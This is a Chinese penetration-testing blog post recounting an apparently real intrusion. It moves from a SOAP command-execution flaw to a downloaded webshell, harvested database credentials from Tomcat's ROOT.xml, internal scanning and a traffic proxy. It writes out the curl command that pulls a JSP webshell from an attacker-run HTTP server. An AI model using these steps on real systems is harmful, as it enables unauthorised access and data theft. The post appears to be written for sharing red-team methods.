![记一次真实的攻防记录]( "记一次真实的攻防记录")
本篇文章所记录内容为一次真实的攻防渗透的记录,具体EXP以及IP部分会打码,主要给大家分享一些思路,以及自己也做一个记录……其实主要呢,还是为了水一篇文章,不然太久不发,家人们都跑路了- -
在测试过程中,发现某个站点存在SOAP RCE,通过构造特定代码可以进行命令执行。后续咱们要获得服务器的权限,先通过构造的代码查看一下目标的系统的路径:
![记一次真实的攻防记录]( "记一次真实的攻防记录")
响应包返回了路径,但这并不是系统所在根目录路径。接下来我们需要获取WebShell得到控制权,但是直接写马在这个路径,可能没有执行权限,那么系统根目录在哪呢?在这里,这就是根目录了:
/home/w/www/xxxxx/webapps/ROOT
接下来我们需要写入WebShell,先尝试用echo把文件写进去,但是无果,故此只能远程下载WebShell了。
先在VPS上丢进去马子,然后python开启一个http服务:
python -m http.server 端口号
curl -o /home/w/www/xxxxx/webapps/ROOT/lnc.jsp http:
接着可以查看有没有下载成功,或者直接在浏览器访问一下WebShell看是否执行:
得到WebShell后我们需要连接数据库获取数据,得到数据分,同样也需要对内网进行渗透。大部分情况下,如果内网没有域的话,我们直接上传fscan直接梭哈即可,如果通过WebShell工具无法直接上传,我们可以尝试使用WebShell工具的命令执行进行远程下载。
连接Shell后,我们可以先找到系统的数据库配置文件,获取数据库的账号密码。如果是JSP的站,而且中间件又是Tomcat的话,数据库配置文件一般在网站根目录下的:
conf/Catalina/localhost/ROOT.xml
我们可以看到数据库用户名和密码。下载有一串连接代码,可以看到连接端口是33066,坑点来了……
它的连接地址是db:33066,正常情况下这里应该是个ip地址
![记一次真实的攻防记录]( "记一次真实的攻防记录")
用冰蝎自带的数据库连接可以连上,但是一旦把这个db换成ip地址连接就出错了……怎么解决呢?他肯定是改了hosts文件:
很明显,他将ip指向了db,所以db就是这个ip地址的替代,那么指向的这个ip就是真正的数据库连接地址。
好的,接下来就是上传代理,将流量从内网带出来,使用Navicat进行数据库连接:
![记一次真实的攻防记录]( "记一次真实的攻防记录")
利用本账号所发文章
进行直接或间接的非法行为
均由操作者本人负全责
犀利猪安全及文章对应作者
不为此承担任何责任
原文始发于微信公众号(犀利猪安全):记一次真实的攻防记录
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/1829958.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论